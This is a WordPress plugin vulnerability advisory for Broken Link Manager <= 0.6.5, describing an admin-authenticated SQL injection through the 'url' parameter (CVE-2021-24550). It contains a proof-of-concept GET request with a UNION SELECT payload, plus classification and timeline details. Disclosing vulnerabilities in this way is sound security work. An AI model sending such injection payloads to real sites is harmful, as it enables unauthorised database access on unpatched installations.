WordPress Plugin Vulnerabilities

Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection

Description

The plugin does not sanitise, validate or escape the url GET parameter before using it in a SQL statement when retrieving an URL to edit, leading to an authenticated SQL injection issue

Proof of Concept

GET /wp-admin/admin.php?page=wblm-edit-url&url=-4966%20UNION%20ALL%20SELECT%20NULL,current_user(),current_user(),NULL,NULL,NULL,NULL-- HTTP/1.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close

Affects Plugins

Plugin icon
broken-link-manager
No known fix

References

CVE
CVE-2021-24550
URL
https://codevigilant.com/disclosure/2021/wp-plugin-broken-link-manager/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
5.5 (medium)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
1bf65448-689c-474d-a566-c9b6797d3e4a

Timeline

Publicly Published
2021-07-24 (about 2 years ago)
Added
2021-07-24 (about 2 years ago)
Last Updated
2022-02-24 (about 2 years ago)

Other

Published
Title
Published
2024-03-26
Title
Photos and Files Contest Gallery < 21.3.5 - Authenticated (Contributor+) SQL Injection
Published
2014-09-19
Title
YAWPP < 1.2.2 - SQL Injection
Published
2023-07-12
Title
User Activity Log < 1.6.3 - Admin+ SQLi
Published
2022-02-16
Title
WP Statistics < 13.1.6 - Unauthenticated Blind SQL Injection via current_page_type
Published
2018-02-22
Title
Custom Permalinks <= 1.1 - Authenticated SQL Injection